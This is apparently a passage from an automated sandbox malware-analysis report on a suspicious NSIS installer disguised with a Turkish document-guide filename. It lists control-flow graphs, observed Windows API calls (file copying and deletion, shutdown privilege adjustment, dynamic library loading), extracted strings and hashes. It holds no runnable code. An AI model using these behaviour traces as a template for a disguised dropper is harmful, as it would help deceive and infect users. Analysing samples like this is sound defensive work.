57 4036fe-40370e call 4038d0 OleUninitialize 38->57 39->38 52 4035fd-40362d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40335e 39->52 50 403530-403535 42->50 51 40354b-403585 42->51 48 4034e6-4034e9 43->48 49 4034eb 43->49 48->42 48->49 49->42 50->51 58 403537-40353f 50->58 51->37 53 403587-40358b 51->53 52->38 52->57 53->37 60 4035ac-4035ba call 4062ba 53->60 54->55 55->28 61 4035aa 55->61 62 4036ee-4036f5 call 4039aa 56->62 63 40365f-40366a call 405bbc 56->63 75 403834-40383a 57->75 76 403714-403724 call 405920 ExitProcess 57->76 65 403541-403544 58->65 66 403546 58->66 68 4035bf 60->68 61->68 74 4036fa 62->74 80 4036b8-4036c2 63->80 81 40366c-4036a1 63->81 65->51 65->66 66->51 68->29 74->57 78 4038b8-4038c0 75->78 79 40383c-403852 GetCurrentProcess OpenProcessToken 75->79 82 4038c2 78->82 83 4038c6-4038ca ExitProcess 78->83 87 403854-403882 LookupPrivilegeValueW AdjustTokenPrivileges 79->87 88 403888-403896 call 406694 79->88 85 4036c4-4036d2 call 405c97 80->85 86 40372a-40373e call 40588b lstrcatW 80->86 89 4036a3-4036a7 81->89 82->83 85->57 99 4036d4-4036ea call 4062ba * 2 85->99 100 403740-403746 lstrcatW 86->100 101 40374b-403765 lstrcatW lstrcmpiW 86->101 87->88 102 4038a4-4038af ExitWindowsEx 88->102 103 403898-4038a2 88->103 93 4036b0-4036b4 89->93 94 4036a9-4036ae 89->94 93->89 98 4036b6 93->98 94->93 94->98 98->80 99->62 100->101 101->57 105 403767-40376a 101->105 102->78 106 4038b1-4038b3 call 40140b 102->106 103->102 103->106 108 403773 call 40586e 105->108 109 40376c-403771 call 4057f1 105->109 106->78 117 403778-403786 SetCurrentDirectoryW 108->117 109->117 118 403793-4037bc call 4062ba 117->118 119 403788-40378e call 4062ba 117->119 123 4037c1-4037dd call 4062dc DeleteFileW 118->123 119->118 126 40381e-403826 123->126 127 4037df-4037ef CopyFileW 123->127 126->123 128 403828-40382f call 406080 126->128 127->126 129 4037f1-403811 call 406080 call 4062dc call 4058a3 127->129 128->57 129->126 138 403813-40381a CloseHandle 129->138 138->126
                                                                                                                                                APIs
                                                                                                                                                • SetErrorMode.KERNELBASE ref: 004033B2
                                                                                                                                                • GetVersion.KERNEL32 ref: 004033B8
                                                                                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
                                                                                                                                                • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0040342F
                                                                                                                                                • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040344B
                                                                                                                                                • GetCommandLineW.KERNEL32(Fjernbetjeningsenhedernes Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
                                                                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe",00000020,"C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe",00000000,?,00000006,00000008,0000000A), ref: 00403498
                                                                                                                                                  • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                  • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D2
                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035E3
                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035EF
                                                                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403603
                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040360B
                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040361C
                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403624
                                                                                                                                                • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403638
                                                                                                                                                  • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Fjernbetjeningsenhedernes Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403703
                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403724
                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403737
                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403746
                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403751
                                                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403779
                                                                                                                                                • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037D3
                                                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037E7
                                                                                                                                                • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 00403814
                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                                                                                                                                • ExitProcess.KERNEL32 ref: 004038CA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                • String ID: "C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146$C:\Users\user\Desktop$C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe$Error launching installer$Fjernbetjeningsenhedernes Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                • API String ID: 3441113951-1633507680
                                                                                                                                                • Opcode ID: c69f0a08dcb2e1d024cd1a682ba050e32cb95b0861efa09548cea5cd73a41d6c
                                                                                                                                                • Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
                                                                                                                                                • Opcode Fuzzy Hash: c69f0a08dcb2e1d024cd1a682ba050e32cb95b0861efa09548cea5cd73a41d6c
                                                                                                                                                • Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 139 404c9e-404cea GetDlgItem * 2 140 404cf0-404d84 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->140 141 404f0b-404f12 139->141 142 404d93-404d9a DeleteObject 140->142 143 404d86-404d91 SendMessageW 140->143 144 404f14-404f24 141->144 145 404f26 141->145 147 404d9c-404da4 142->147 143->142 146 404f29-404f32 144->146 145->146 148 404f34-404f37 146->148 149 404f3d-404f43 146->149 150 404da6-404da9 147->150 151 404dcd-404dd1 147->151 148->149 152 405021-405028 148->152 155 404f52-404f59 149->155 156 404f45-404f4c 149->156 153 404dab 150->153 154 404dae-404dcb call 4062dc SendMessageW * 2 150->154 151->147 157 404dd3-404dff call 404231 * 2 151->157 158 405099-4050a1 152->158 159 40502a-405030 152->159 153->154 154->151 161 404f5b-404f5e 155->161 162 404fce-404fd1 155->162 156->152 156->155 193 404e05-404e0b 157->193 194 404eca-404edd GetWindowLongW SetWindowLongW 157->194 167 4050a3-4050a9 SendMessageW 158->167 168 4050ab-4050b2 158->168 164 405281-405293 call 404298 159->164 165 405036-405040 159->165 170 404f60-404f67 161->170 171 404f69-404f7e call 404bec 161->171 162->152 166 404fd3-404fdd 162->166 165->164 174 405046-405055 SendMessageW 165->174 176 404fed-404ff7 166->176 177 404fdf-404feb SendMessageW 166->177 167->168 178 4050b4-4050bb 168->178 179 4050e6-4050ed 168->179 170->162 170->171 171->162 192 404f80-404f91 171->192 174->164 184 40505b-40506c SendMessageW 174->184 176->152 186 404ff9-405003 176->186 177->176 187 4050c4-4050cb 178->187 188 4050bd-4050be ImageList_Destroy 178->188 182 405243-40524a 179->182 183 4050f3-4050ff call 4011ef 179->183 182->164 198 40524c-405253 182->198 211 405101-405104 183->211 212 40510f-405112 183->212 196 405076-405078 184->196 197 40506e-405074 184->197 199 405014-40501e 186->199 200 405005-405012 186->200 190 4050d4-4050e0 187->190 191 4050cd-4050ce GlobalFree 187->191 188->187 190->179 191->190 192->162 201 404f93-404f95 192->201 202 404e0e-404e15 193->202 206 404ee3-404ee7 194->206 204 405079-405092 call 401299 SendMessageW 196->204 197->196 197->204 198->164 205 405255-40527f ShowWindow GetDlgItem ShowWindow 198->205 199->152 200->152 207 404f97-404f9e 201->207 208 404fa8 201->208 209 404eab-404ebe 202->209 210 404e1b-404e43 202->210 204->158 205->164 214 404f01-404f09 call 404266 206->214 215 404ee9-404efc ShowWindow call 404266 206->215 217 404fa0-404fa2 207->217 218 404fa4-404fa6 207->218 221 404fab-404fc7 call 40117d 208->221 209->202 225 404ec4-404ec8 209->225 219 404e45-404e7b SendMessageW 210->219 220 404e7d-404e7f 210->220 222 405106 211->222 223 405107-40510a call 404c6c 211->223 226 405153-405177 call 4011ef 212->226 227 405114-40512d call 4012e2 call 401299 212->227 214->141 215->164 217->221 218->221 219->209 231 404e81-404e90 SendMessageW 220->231 232 404e92-404ea8 SendMessageW 220->232 221->162 222->223 223->212 225->194 225->206 240 405219-40522d InvalidateRect 226->240 241 40517d 226->241 246 40513d-40514c SendMessageW 227->246 247 40512f-405135 227->247 231->209 232->209 240->182 243 40522f-40523e call 404bbf call 404ba7 240->243 244 405180-40518b 241->244 243->182 248 405201-405213 244->248 249 40518d-40519c 244->249 246->226 251 405137 247->251 252 405138-40513b 247->252 248->240 248->244 254 40519e-4051ab 249->254 255 4051af-4051b2 249->255 251->252 252->246 252->247 254->255 256 4051b4-4051b7 255->256 257 4051b9-4051c2 255->257 259 4051c7-4051ff SendMessageW * 2 256->259 257->259 260 4051c4 257->260 259->248 260->259
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404CC1
                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
                                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00404D94
                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 004050CE
                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 0040526D
                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                                                                                                                                • ShowWindow.USER32(00000000), ref: 0040527F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                • String ID: $M$N$\oZ
                                                                                                                                                • API String ID: 1638840714-1691053871
                                                                                                                                                • Opcode ID: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                                                                                                                                • Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
                                                                                                                                                • Opcode Fuzzy Hash: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                                                                                                                                • Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 704D121B: GlobalAlloc.KERNELBASE(00000040,?,704D123B,?,704D12DF,00000019,704D11BE,-000000A0), ref: 704D1225
                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 704D1C6B
                                                                                                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 704D1CB3
                                                                                                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 704D1CBD
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 704D1CD0
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 704D1DB2
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 704D1DB7
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 704D1DBC
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 704D1FA6
                                                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 704D2140
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000008), ref: 704D21B5
                                                                                                                                                • LoadLibraryW.KERNEL32(00000008), ref: 704D21C6
                                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 704D2220
                                                                                                                                                • lstrlenW.KERNEL32(00000808), ref: 704D223A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1148824635.00000000704D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 704D0000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1148761933.00000000704D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1148866058.00000000704D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1148910359.00000000704D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_704d0000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 245916457-0
                                                                                                                                                • Opcode ID: 8e1789ba72033a8485b3fd89cf74306d0cb2781f8e33423f47d2186b515c2657
                                                                                                                                                • Instruction ID: 5ce1fad1ec2aad6cc128a125108838a10672d9f478e60645e43bc8aaaed23621
                                                                                                                                                • Opcode Fuzzy Hash: 8e1789ba72033a8485b3fd89cf74306d0cb2781f8e33423f47d2186b515c2657
                                                                                                                                                • Instruction Fuzzy Hash: 7B229C71D04205EECB128FB4C9A46ADB7F5FB04305F20456EEB66E23A0D7786A81DB51
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 783 4059cc-4059f2 call 405c97 786 4059f4-405a06 DeleteFileW 783->786 787 405a0b-405a12 783->787 788 405b88-405b8c 786->788 789 405a14-405a16 787->789 790 405a25-405a35 call 4062ba 787->790 791 405b36-405b3b 789->791 792 405a1c-405a1f 789->792 798 405a44-405a45 call 405bdb 790->798 799 405a37-405a42 lstrcatW 790->799 791->788 794 405b3d-405b40 791->794 792->790 792->791 796 405b42-405b48 794->796 797 405b4a-405b52 call 4065fd 794->797 796->788 797->788 807 405b54-405b68 call 405b8f call 405984 797->807 801 405a4a-405a4e 798->801 799->801 803 405a50-405a58 801->803 804 405a5a-405a60 lstrcatW 801->804 803->804 806 405a65-405a81 lstrlenW FindFirstFileW 803->806 804->806 808 405a87-405a8f 806->808 809 405b2b-405b2f 806->809 823 405b80-405b83 call 405322 807->823 824 405b6a-405b6d 807->824 811 405a91-405a99 808->811 812 405aaf-405ac3 call 4062ba 808->812 809->791 814 405b31 809->814 815 405a9b-405aa3 811->815 816 405b0e-405b1e FindNextFileW 811->816 825 405ac5-405acd 812->825 826 405ada-405ae5 call 405984 812->826 814->791 815->812 819 405aa5-405aad 815->819 816->808 822 405b24-405b25 FindClose 816->822 819->812 819->816 822->809 823->788 824->796 829 405b6f-405b7e call 405322 call 406080 824->829 825->816 830 405acf-405ad8 call 4059cc 825->830 834 405b06-405b09 call 405322 826->834 835 405ae7-405aea 826->835 829->788 830->816 834->816 838 405aec-405afc call 405322 call 406080 835->838 839 405afe-405b04 835->839 838->816 839->816
                                                                                                                                                APIs
                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,771A3420,00000000), ref: 004059F5
                                                                                                                                                • lstrcatW.KERNEL32(0042F250,\*.*), ref: 00405A3D
                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405A60
                                                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,771A3420,00000000), ref: 00405A66
                                                                                                                                                • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,771A3420,00000000), ref: 00405A76
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00405B25
                                                                                                                                                Strings
                                                                                                                                                • \*.*, xrefs: 00405A37
                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004059DA
                                                                                                                                                • "C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe", xrefs: 004059CC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                • String ID: "C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                • API String ID: 2035342205-1195030092
                                                                                                                                                • Opcode ID: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
                                                                                                                                                • Instruction ID: 87b7c1c15068e6398432f2de95375e915c3ae258b511550e47b187391169d043
                                                                                                                                                • Opcode Fuzzy Hash: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
                                                                                                                                                • Instruction Fuzzy Hash: EE41E430900914BACB21AB618C89ABF7778EF45768F50427FF801B11D1D77CA982DE6E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CE0,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,771A3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,771A3420), ref: 00406608
                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 00406614
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                                                                                                • Instruction ID: 1ab566c2093321911261fd6ef708f8cedd572ce36bb67071c96f4f7979b88ecc
                                                                                                                                                • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                                                                                                • Instruction Fuzzy Hash: 3AD012315051205BC3401B386E0C85B7A599F55331B159F37F86AF51E0DB758C72869C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
